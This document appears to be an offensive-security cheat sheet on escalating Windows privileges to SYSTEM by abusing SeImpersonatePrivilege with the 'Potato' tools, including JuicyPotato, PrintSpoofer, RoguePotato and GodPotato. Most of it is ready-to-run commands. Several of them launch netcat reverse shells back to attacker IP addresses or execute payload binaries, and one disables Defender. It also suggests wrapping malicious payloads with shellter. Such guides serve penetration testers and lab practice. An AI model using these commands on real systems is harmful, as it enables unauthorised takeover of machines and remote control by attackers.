SeImpersonatePrivilege

This method takes advantage of SeImpersonatorPrivilege or SeAssignPrimaryTokenPrivelge privelges to elevate the privilege from local to system. This is usually enabled by default when IIS or SQL services are installed.

The status can be checked using the following command,

whoami /priv

HotPotato

It was the first potato and was discovered by Stephen Breen. It can be downloaded from here. DCOM has to be enabled for this attack to work.

Potato.exe -ip -cmd [cmd to run] -disable_exhaust true -disable_defender true

JuicyPotato

Juicypotato is a privilege escalation tool created by Andrea Pierini and Giuseppe Trotta.

A COM server with unique CLSID is required for exploiting this vulnerability. You can get the CLSID from the predefined list put together by the author here.

Alternatively, you can also find the CLSID that will work on the target system by using the following series of scripts,

Load the following PS script,

juicy-potato/Join-Object.ps1 at master · ohpe/juicy-potatoGitHub

Then use the following script to generate the list of possible CLSID,

juicy-potato/GetCLSID.ps1 at master · ohpe/juicy-potatoGitHub

The following script will then try all the CLSID that you generated to find a vulnerable one,

juicy-potato/test_clsid.bat at master · ohpe/juicy-potatoGitHub

Once we have everything we need we can use the Juicypotato to elevate the privilege by executing Netcat and have it do a reverse shell back to your machine,

JuicyPotato -l 1337 -c "{4991d34b-80a1-4291-83b6-3328366b9097}" -p c:\windows\system32\cmd.exe -a "/c c:\users\public\desktop\nc.exe -e cmd.exe 192.168.1.11 443" -t *

You can also craft a common executable with the malicious payload using tools like "shellter" and have it executed from the target system through Juicypotato.

JuicyPotato doesn't work on Windows Server 2019 and Windows 10 build 1809 onwards.

JuicyPotatoNG

This is the next iteration of the JuicyPotato and it can be downloaded from here.

.\JuicyPotatoNG.exe -t * -p "C:\Windows\system32\cmd.exe" -a "/c C:\temp\nc64.exe 192.168.45.180 4433 -e cmd.exe"

PrintSpoofer64

The executable can be downloaded from here.

.\PrintSpoofer.exe -c "c:\tools\nc.exe 10.10.10.10 443 -e cmd"

RoguePotato

The executable can be downloaded from here.

.\RoguePotato.exe -r YOUR_IP -e "C:WRITABLE_DIRECTORY\rs443.exe" -l 9999

GodPotato

The executable can be downloaded from here.

.\GodPotato-NET35.exe -cmd "C:\Users\john\Desktop\rs4444.exe"

SharpEfsPotato

The executable can be downloaded from here.

SharpEfsPotato.exe -p "C:\Windows\system32\cmd.exe" -a "/c C:\temp\nc64.exe 192.168.45.180 4433 -e cmd.exe"